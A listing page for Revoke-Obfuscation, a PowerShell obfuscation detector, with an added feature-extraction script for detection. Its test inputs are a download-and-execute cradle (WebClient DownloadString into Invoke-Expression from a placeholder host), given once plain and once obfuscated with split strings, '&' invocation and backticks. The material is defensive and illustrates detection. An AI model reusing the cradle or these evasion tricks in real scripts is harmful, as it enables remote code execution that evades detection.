
Revoke-Obfuscation v1.0

Free

Revoke-Obfuscation is a PowerShell v3.0+ compatible PowerShell obfuscation detection framework. It was designed to highlight the limitations of a purely signature-based approach to detecting attackers' usage of PowerShell. It provides a new, scalable means of generically detecting both known and unknown obfuscation techniques.

Authors: Daniel Bohannon (@danielhbohannon), Lee Holmes (@Lee_Homes)

Research Blog Post: https://www.fireeye.com/blog/threat-research/2017/07/revoke-obfuscation-powershell.html

White Paper: https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf
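The "generic rather than signature-based" idea above rests on measuring structural properties of a script (character distributions, AST shape) instead of matching known strings. The following is an added illustration written for this page, not Revoke-Obfuscation's own code: it parses a script with the built-in PowerShell parser, extracts a handful of hand-picked features, and applies an assumed threshold to show why a plain script and an obfuscated equivalent separate cleanly even when no signature matches. The feature names, the two constructed sample scripts and the scoring thresholds are assumptions for illustration only; the project's real feature set and classifier are described in the white paper linked above.

```powershell
# Added example, not part of Revoke-Obfuscation. Extracts simple obfuscation
# features from a script via the PowerShell AST and applies an assumed rule.

function Get-ObfuscationFeatures {
    param([Parameter(Mandatory)][string]$ScriptText)

    $tokens = $null
    $errors = $null
    $ast = [System.Management.Automation.Language.Parser]::ParseInput(
        $ScriptText, [ref]$tokens, [ref]$errors)

    $len = [math]::Max($ScriptText.Length, 1)
    # Characters that are neither alphanumeric nor whitespace: quotes, plus signs,
    # parentheses and backticks dominate most string-level obfuscation.
    $nonAlnum = ($ScriptText.ToCharArray() |
        Where-Object { $_ -notmatch '[A-Za-z0-9\s]' }).Count

    # Every AST node, grouped by node type. Obfuscated scripts tend to be
    # dominated by one node kind (e.g. string concatenation expressions).
    $nodes  = $ast.FindAll({ $true }, $true)
    $byType = $nodes | Group-Object { $_.GetType().Name } | Sort-Object Count -Descending

    [pscustomobject]@{
        Length           = $ScriptText.Length
        ParseErrors      = $errors.Count
        BacktickCount    = ([regex]::Matches($ScriptText, '`')).Count
        NonAlnumRatio    = [math]::Round($nonAlnum / $len, 3)
        # '&' tokens: invocation of a command whose name is built at runtime.
        AmpersandCount   = @($tokens | Where-Object { $_.Kind -eq 'Ampersand' }).Count
        AstNodeCount     = $nodes.Count
        TopNodeType      = $byType[0].Name
        TopNodeTypeShare = [math]::Round($byType[0].Count / [math]::Max($nodes.Count, 1), 3)
    }
}

function Test-LikelyObfuscated {
    param([Parameter(Mandatory)][psobject]$Features)
    # Assumed, hand-chosen thresholds for illustration; a real classifier
    # learns these from labelled data rather than hard-coding them.
    ($Features.NonAlnumRatio -gt 0.30) -or
    ($Features.BacktickCount -gt 3) -or
    ($Features.AmpersandCount -gt 0 -and $Features.TopNodeTypeShare -gt 0.40)
}

# Constructed sample inputs. Both do the same thing semantically; only the
# second is obfuscated (split strings, '&' invocation, backtick insertion).
$plain = @'
$client = New-Object Net.WebClient
Invoke-Expression $client.DownloadString('http://example.invalid/a.ps1')
'@

$obfuscated = @'
$c = &('Ne'+'w-Ob'+'ject') ('Ne'+'t.We'+'bCli'+'ent')
I`e`X ($c.("Down"+"loadStr"+"ing").Invoke('http://example.invalid/a.ps1'))
'@

foreach ($sample in @(@{Name='plain'; Text=$plain}, @{Name='obfuscated'; Text=$obfuscated})) {
    $f = Get-ObfuscationFeatures -ScriptText $sample.Text
    "{0,-11} flagged={1}" -f $sample.Name, (Test-LikelyObfuscated -Features $f)
    $f | Format-List | Out-String | Write-Verbose -Verbose
}
```

Note that no string in `$obfuscated` matches `New-Object`, `Net.WebClient` or `Invoke-Expression`, so a signature on those names misses it entirely, while the character-ratio, backtick and `&` features flag it without knowing the specific trick used. To run the framework itself rather than this toy, load the module from the project repository and use its own `Measure-RvoObfuscation` cmdlet (parameter names per the project README).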

ALTERNATIVES

- Leading open source automated malware analysis system.
- A tool for translating Dalvik bytecode to equivalent Java bytecode, allowing Java analysis tools to analyze Android applications.
- A tool that recovers passwords from pixelized screenshots.
- A collection of YARA rules for identifying malicious PEs with unique or suspicious PDB paths.
- Scans running processes for potentially malicious implants and dumps them.
- Code to prevent a managed .NET debugger/profiler from working.
- A tool that scans a corpus of malware and builds a YARA rule to detect similar code sections.
- A collection of YARA rules for public use, built from intelligence profiles and file work.
